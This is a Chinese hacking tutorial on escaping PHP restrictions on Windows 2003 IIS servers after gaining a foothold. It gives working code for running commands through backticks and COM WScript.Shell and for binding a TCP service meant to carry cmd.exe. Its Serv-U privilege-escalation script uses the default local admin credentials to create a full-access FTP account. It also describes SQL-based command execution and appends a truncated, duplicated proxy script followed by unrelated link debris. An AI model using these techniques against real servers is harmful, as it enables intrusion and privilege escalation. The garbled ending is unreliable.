突破Windows 2003 PHP服务器的新思路

  从WIN2000到WIN XP, 再到WIN2003, MS IIS服务器安全性的提高是显而易见的。 在WIN2000中, 一个普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也无法用system() 等函数执行系统命令, 但是我们还能用com()函数进行突破;到WIN 2003,即使IIS 和PHP都是默认安装,你用system(), com()也可能拿它没辙。这时候你就不得不使用一些新的方法来进行突破了。
 
  1、disable_functions的突破

  在php -4.0.1以上的版本,php.ini里引入了一项功能disable_functions , 这个功能比较有用,可以用它禁止一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候将会提示Warning: system() has been disabled for security reasons,同时程序终止运行。但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令,示例代码如下:

  <?$output = `ls -al`;echo "<pre>$output</pre>";?>

  据说这个只有设成safe_mode为on才能避免,但上次我在一台国外的服务器上使用的时候还是失败了,人并不是什么时候都能那么走运的:)

  2、dl()函数的应用

  当任何PHP的内部命令执行数和''都无法使用的时候,可以尝试dl(),该方法只能用于safe mode=off, 因为它在安全模式下是被禁用的。利用dl()你可以直接调用W32api 函数,可惜这个扩展已被移动到 PECL 库中,且自PHP 5.1.0以下版本起不再被绑定。以下是手册里的例子:

  // 加载此扩展

  dl("php_w32api.dll");

  // 注册 GetTickCount 函数,来自 kernel32.dll

  w32api_register_function("kernel32.dll",

  "GetTickCount",

  "long");

  // 注册 MessageBoxA 函数,来自 User32.dll

  w32api_register_function("User32.dll",

  "MessageBoxA",

  "long");

  // 取得开机时间信息

  $ticks = GetTickCount();

  // 转换为易于理解的文本

  $secs = floor($ticks / 1000);

  $mins = floor($secs / 60);

  $hours = floor($mins / 60);

  $str = sprintf("You have been using your computer for:".

  "\r\n %d Milliseconds, or \r\n %d Seconds".

  "or \r\n %d mins or\r\n %d hours %d mins.",

  $ticks,

  $secs,

  $mins,

  $hours,

  $mins - ($hours*60));

  // 显示一个消息对话框,只有一个 OK 按钮和上面的开机时间文本

  MessageBoxA(NULL,

  $str,

  "Uptime Information",

  MB_OK);

  ?>

  可惜我还没有理解透彻dl()和W32api, 所以就不乱举例子了, 免得误导读者。

  3、COM 和 .Net(Windows)函数的应用

  COM(Component Object Model,组件对象模型)是微软开发的软件规范,它用于开发面向对象的、编译好的软件组件,它允许把软件抽象成为二进制的部件,主要运用于windows平台。

  PHP 的 Windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用COM函数。它的使用方法类似于C++或Java中类的创建的语法,并把COM的类名作为参数传递到构造函数。例如使用在PHP中调用“WScript.Shell”执行系统命令:

  $cmd=” E:/cert/admin/psexec.exe”;

  if($com=new COM("WScript.Shell")) echo "yes";

  if(!$cmd1=$com->exec($cmd))

  {

  echo "can not exec()";

  }

  if(!$cmd2=$cmd1->stdout())

  {

  echo "can not stdout()";

  }

  if(!$cmd3=$cmd2->readall())

  {

  echo "can not readall()";

  }

  echo $cmd3;

  ?>

  图1是我写的一个执行psexec.exe的一个例子。

  这段代码与ASP的的意思是一模一样的,当然,你也可以像ASP那样调用“ADODB.Connection”,利用这个组件结合jet2溢出漏洞,可能能够在PHP Saft mode=ON下拿到一个Shell。

  //create the database connection

  $conn = new COM("ADODB.Connection");

  $dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");

  $conn->Open($dsn);

  //pull the data through SQL string

  $rs = $conn->Execute("select clients from web");

  …..

  ?>

  .Net 函数只能运行在 PHP 5上,当然,它需要 “.Net runtime”的支持,而且这的PHP的一个实验性模块,功能还未齐全,所以在这就不讨论了。

  4、Java()函数的应用

  该方法适用于safe mode=on。要使用JAVA模块服务器必须事先安装Java虚拟机,而且在PHP安装配置的时候打开了with-java的选项,代码如下:

  [JAVA]

  ;这是到php_java.jar的路径

  ;java.class.path = .\php_java.jar

  ;JDK的路径

  ;Java.home = f:\jdk1.3.0

  ;到虚拟机的路径

  ;Java.library=f:\jdk1.3.0\jre\bin\hostspot\jvm.dll

  同COM一样,使用Java创建类(不仅仅是JavaBeans)只需把JAVA的类名作为参数传递到构造函数。以下是手册里边的一个例子:

  // This example is only intended to be run as a CGI.

  $frame = new Java('java.awt.Frame', 'PHP');

  $button = new Java('java.awt.Button', 'Hello Java World!');

  $frame->add('North', $button);

  $frame->validate();

  $frame->pack();

  $frame->visible = True;

  $thread = new Java('java.lang.Thread');

  $thread->sleep(10000);

  $frame->dispose();

  ?>

  可惜能真正支持JAVA的PHP服务器并不多见,所以在这也不多讨论了。

  5、socket()函数的应用

  socket 是PHP中功能极为强大的一个模块,如果你使用高级的、抽象的接口(由fsockopen()和psockopen函数打开的socket),是不需要打开“php_sockets.dll”的。但是如果要使用完整的socket函数块,就必须在php.ini这样设置:

  ;Windows Extensions

  ;Note that MySQL and ODBC support is now built in, so no dll is needed for it.

  ……..

  ;去掉以下一句最前边的分号

  ;extension=php_sockets.dll

  使用PHP的socket函数块可以实现端口转发/重定向、数据包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且, 还可以用它构造TCP/UDP服务器, 同时, 我觉得它也是突破服务器安全策略的一个最好的办法。以下便是一个在服务器上打开端口构造TCP服务器的例子,你可以用它来捆绑上服务器的cmd.exe:

  //在服务器上构造TCP服务

  //该例子需要php_sockets.dll的支持

  //执行后便可使用” telnet 127.0.0.1 1020”连接

  error_reporting(E_ALL);

  /* Allow the script to hang around waiting for connections. */

  set_time_limit(0);

  /* Turn on implicit output flushing so we see what we're getting

  * as it comes in. */

  ob_implicit_flush();

  //在服务器上绑定IP和端口

  $address = '127.0.0.1';

  $port = 1020;

  if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {

  echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";

  }

  if (($ret = socket_bind($sock, $address, $port)) < 0) {

  echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";

  }

  if (($ret = socket_listen($sock, 5)) < 0) {

  echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";

  }

  do {

  if (($msgsock = socket_accept($sock)) < 0) {

  echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";

  break;

  }

  /* Send instructions. */

  $msg = "\nWelcome to the PHP Test Server. \n" .

  "To quit, type 'quit'. To shut down the server type 'shutdown'.\n";

  socket_write($msgsock, $msg, strlen($msg));

  do {

  if (false === socket_recv($msgsock, $buf , 1024, 0)) {

  echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n";

  break 2;

  }

  if (!$buf = trim($buf)) {

  continue;

  }

  if ($buf == 'quit') {

  break;

  }

  if ($buf == 'shutdown') {

  socket_close($msgsock);

  break 2;

  }

  $talkback = "PHP: You said '$buf'.\n";

  socket_write($msgsock, $talkback, strlen($talkback));

  echo "$buf\n";

  //以下处理接受到的buf

  /*eg:例如

  $buf=”cmd.exe /c netstat –an”;

  $pp = popen('$buf ', 'r');

  While($read = fgets($pp, 2096))

  echo $read;

  pclose($pp);

  */

  } while (true);

  socket_close($msgsock);

  } while (true);

  socket_close($sock);

  ?>

  事实上,很多主机都是没有加载php_sockets.dll的,庆幸的是,不需要socket模块支持的“fsockopen”函数已经足够我们使用了。因为只要有“fsockopen”,我们便可以自由地读写本机中未对外部开放的端口。使用fsockopen读写serv-u 的本地管理端口43958 (注: 该端口无法在外部连结) 进行提权便是一个很典型的例子:

  $adminuser=” LocalAdministrator”;

  $adminpass=” #l@$ak#.lk;0@P”;

  $adminport=” 43958”;

  $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);

  if (!$fp) {

  echo "$errstr ($errno)

  \n";

  } else {

  //可以写入$shellcode

  // fputs ($fp, $shellcode);

  fputs ($fp, "USER ".$adminuser."\r\n");

  sleep (1);

  fputs ($fp, "PASS ".$adminpass."\r\n");

  sleep (1);

  fputs ($fp, "SITE MAINTENANCE\r\n");

  sleep (1);

  fputs ($fp, "-SETUSERSETUP\r\n");

  fputs ($fp, "-IP=".$addr."\r\n");

  fputs ($fp, "-PortNo=".$ftpport."\r\n");

  fputs ($fp, "-User=".$user."\r\n");

  fputs ($fp, "-Password=".$password."\r\n");

  fputs ($fp, "-HomeDir=".$homedir."\r\n");

  fputs ($fp, "-LoginMesFile=\r\n");

  fputs ($fp, "-Disable=0\r\n");

  fputs ($fp, "-RelPaths=0\r\n");

  fputs ($fp, "-NeedSecure=0\r\n");

  fputs ($fp, "-HideHidden=0\r\n");

  fputs ($fp, "-AlwaysAllowLogin=0\r\n");

  fputs ($fp, "-ChangePassword=1\r\n");

  fputs ($fp, "-QuotaEnable=0\r\n");

  fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");

  fputs ($fp, "-SpeedLimitUp=-1\r\n");

  fputs ($fp, "-SpeedLimitDown=-1\r\n");

  fputs ($fp, "-MaxNrUsers=-1\r\n");

  fputs ($fp, "-IdleTimeOut=600\r\n");

  fputs ($fp, "-SessionTimeOut=-1\r\n");

  fputs ($fp, "-Expire=0\r\n");

  fputs ($fp, "-RatioUp=1\r\n");

  fputs ($fp, "-RatioDown=1\r\n");

  fputs ($fp, "-RatiosCredit=0\r\n");

  fputs ($fp, "-QuotaCurrent=0\r\n");

  fputs ($fp, "-QuotaMaximum=0\r\n");

  fputs ($fp, "-Maintenance=System\r\n");

  fputs ($fp, "-PasswordType=Regular\r\n");

  fputs ($fp, "-Ratios=None\r\n");

  fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");

  fputs ($fp, "QUIT\r\n");

  sleep (1);

  while (!feof($fp)) {

  echo fgets ($fp,128);

  }

  }

  ?>

  还可以利用fsockopen编写HTTP代理,从而访问外网或本机中无法外部访问的网站。我手上有一个完整的HTTPProxy(图4),代码较长。有兴趣的读者可以看看。

  6、MYSQL/MSSQL接口

  不同于Linux的是,windows下的mysql/MSSQL一般是以系统管理员身份运行的,因此,只要能拿到本机SQL数据库中的root/sa密码,你就可以直接用PHP连接数据库来执行系统命令。

  在Mysql中执行系统命令要利用用户自定义函数“MySQL UDF Dynamic Library”这个漏洞。在MSSQL中只要连接上数据库,就能直接调用“master..xp_cmdshell“扩展执行命令,权限当然是system权限。

  总结一下:由于系统、IIS、PHP的版本不一样,以上提到的几个突破方法可能会有所变化,PHP还有许多扩展功能是可以利用的,走出system()那几个系统命令执行函数,你就有可能突破系统安全策略的限制!

  后面附上proxy.php的代码

  error_reporting(E_ALL);

  /*

  // This program is free software; you can redistribute it and/or

  // modify it under the terms of the GNU General Public License

  // as published by the Free Software Foundation; either version 2

  // of the License, or (at your option) any later version.

  //

  // This program is distributed in the hope that it will be useful,

  // but WITHOUT ANY WARRANTY; without even the implied warranty of

  // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

  // GNU General Public License for more details.

  //

  // You should have received a copy of the GNU General Public License

  // along with this program; if not, write to the Free Software

  // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

  //-------------------------------------------------------------------

  // Class: PHProxy

  // Author: ultimategamer00 (Abdullah A.)

  // Last Modified: 6:28 PM 6/22/2004

  */

  function __stripslashes($str)

  {

  return get_magic_quotes_gpc() ? stripslashes($str) : $str;

  }

  if (!function_exists('str_rot13'))

  {

  function str_rot13($str)

  {

  static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',

  'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');

  return strtr($str, $alpha[0], $alpha[1]);

  }

  }

  class PHProxy

  {

  var $allowed_hosts = array();

  var $version;

  var $script_url;

  var $url;

  var $url_segments;

  var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);

  var $socket;

  var $content_type;

  var $request_headers;

  var $post_body;

  var $response_headers;

  var $response_body;

  function PHProxy($flags = 'previous')

  {

  $this->version = '0.2';

  $this->script_url = 'http'

  . (isset(

  function set_request_headers()

  {

  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0\r\n";

  $headers .= "Host: :\r\n";

  $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";

  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";

  $headers .= "Connection: close\r\n";

  if ($this->flags['show_referer'] == 1)

  {

  $headers .= "Referer: \r\n";

  }

  $cookies = $this->get_cookies();

  $headers .= $cookies != '' ? "Cookie: $cookies\r\n" : '';

  if (

  function set_request_headers()

  {

  $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0\r\n";

  $headers .= "Host: :\r\n";

  $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";

  $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";

  $headers .= "Connection: close\r\n";

  if ($this->flags['show_referer'] == 1)

  {

  $headers .= "Referer: \r\n";

  }

  $cookies = $this->get_cookies();

  $headers .= $cookies != '' ? "Cookie: $cookies\r\n" : '';

  if (

时间: 2024-09-22 16:27:23

突破Windows 2003 PHP服务器的新思路的相关文章

windows 2003 VPN服务器的配置

VSS是在一台机器上配置VSS数据库,把数据库的文件夹设置共享,局域网内别的机器可以访问到这个共享文件夹,就可以从源代码数据库中打开项目,配置好VPN后,客户端之间就是相当于在局域网内,VSS的设置就跟局域网内一样的设置. 一.需求描述 单位项目组在局域网中使用VSS(visual source safe 6.0C and visual source safe 2005,分别对应visual studio 2003 和 visual studio2005)进行源代码管理协同开发.一般VSS在局域

两招填补Windows 2003 DNS服务器漏洞

DNS 是域名系统 (Domain Name System) 的缩写.大家在上网时输入的网址,是通过域名解析系解析找到相对应的IP地址才能访问到网站.但是最近微软的Windows 2000和Windows 2003的DNS服务出现一个极高的安全漏洞,如果被黑客成功利用的话,那么我们的上网操作将遇到巨大的麻烦. 黑客姓名:张均诚 黑客特长:Windows系统漏洞研究 使用工具:DNS服务器漏洞利用工具 黑客自白:最近Windows系统的DNS出现了0day漏洞,自从这个安全漏洞的代码被披露,攻击这

Windows 2003域服务器在迁移过程中的设置

我们现在要搬到另一个大楼,而他们使用的是不同的子网络,这样一来我们不得不更改Windows 2003域控制器主机名.IP地址以及所有域成员名和他们的IP地址.而域名及DNS设置都不打算改变.是否有简单的方法能完成,而不用丢失现在的成员域文件? 没有简单的方法.我建议分两个阶段完成,如果可能的话:更改名字及IP地址.在搬走前就要更改名字.遇到问题是很自然的,但在开始搬运前做更改,解决问题就更容易,因为要考虑的因素较少.具体指导可参考Server 2003帮助文件. 如果你目前使用的是DHCP(网络

利用windows 2003实现服务器群集的搭建与架设(一) NLB群集的创建与架设

实验场景: 西安凌云系统高科技有限公司利用IIS搭建了一个WEB站点,域名为nlb.angeldevil.com.由于业务的逐渐增加,网站速度也越来越慢,而且经常出现故障,为公司的利益带来了很多的不便:公司决定使用两台WEB站点为客户机提供访问.因此我们采用了网络负载均衡技术.两台服务器的IP地址是:192.168.1.10和192.168.1.20:而群集所使用的IP地址是192.168.1.30.为了在两台NLB群集的主机上相互管理群集:在DC和DC(两个服务器)成员上分别各添加一个网卡:I

微软拒绝修复60万台 Windows 2003 Web服务器安全漏洞

启用了WebDAV的 Windows Server 2003 机器遭遇安全漏洞影响 接入互联网的约60万台 Windows Server 2003 机器上存在 IIS 6.0 重大安全漏洞. 然而,微软发话称,不会发布补丁供用户防护该零日缓冲区溢出漏洞.相关技术报道参见:CVE-2017-7269 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269 ). 该漏洞存在于微软Web服务器 IIS 6.0 的网页分布式创作与版本

Windows 2003 邮件服务器全攻略

在windows2003下架设邮件服务器的过程跟XP系统类似,可以用系统自带的POP3及SMTP服务建立,也可以借助第三方软件实现.适用环境不同自然采取的方式不同.以下笔者的搭建过程分别以这两种方式为例. 一.利用windows2003自带POP3/SMTP服务实现 第一步:安装这两项服务 默认情况下windows2003是没有安装的,我们必须手工添加.POP3服务组件在"添加/删除windows组件-电子邮件服务"下,它共包括两项内容:POP3服务和POP3服务WEB管理;而SMTP

Windows 2003邮件服务器全攻略

在windows2003下架设邮件服务器的过程跟XP系统类似,可以用系统自带的POP3及SMTP服务建立,也可以借助第三方软件实现.适用环境不同自然采取的方式不同.以下笔者的搭建过程分别以这两种方式为例. 一.利用windows2003自带POP3/SMTP服务实现 第一步:安装这两项服务 默认情况下windows2003是没有安装的,我们必须手工添加.POP3服务组件在"添加/删除windows组件-电子邮件服务"下,它共包括两项内容:POP3服务和POP3服务WEB管理;而SMTP

Windows 2003邮件服务器搭建全攻略

在windows2003下架设邮件服务器的过程跟XP系统类似,可以用系统自带的POP3及SMTP服务建立,也可以借助第三方软件实现.适用环境不同自然采取的方式不同.以下笔者的搭建过程分别以这两种方式为例. 一.利用windows2003自带POP3/SMTP服务实现 第一步:安装这两项服务 默认情况下windows2003是没有安装的,我们必须手工添加.POP3服务组件在"添加/删除windows组件-电子邮件服务"下,它共包括两项内容:POP3服务和POP3服务WEB管理;而SMTP

使用远程桌面连接Windows 2003 &amp; 2008服务器详细图文教程_win服务器

云服务器系统是windows系列的用户,可以使用自己电脑windows系统自带的"远程桌面连接"功能远程连接云服务器.Windows2003/2008系统自带正版激活,不收取你系统正版激活费用,同时 windows2003/2008系统默认允许最多2个session远程连接,如果您需要更多的新增连接数,需要您向微软单独购买远程桌面授权(RD 授权)服务,RD授权费用需要您自理. 操作如下:  1.选择"开始菜单"-"所有程序"-"附件&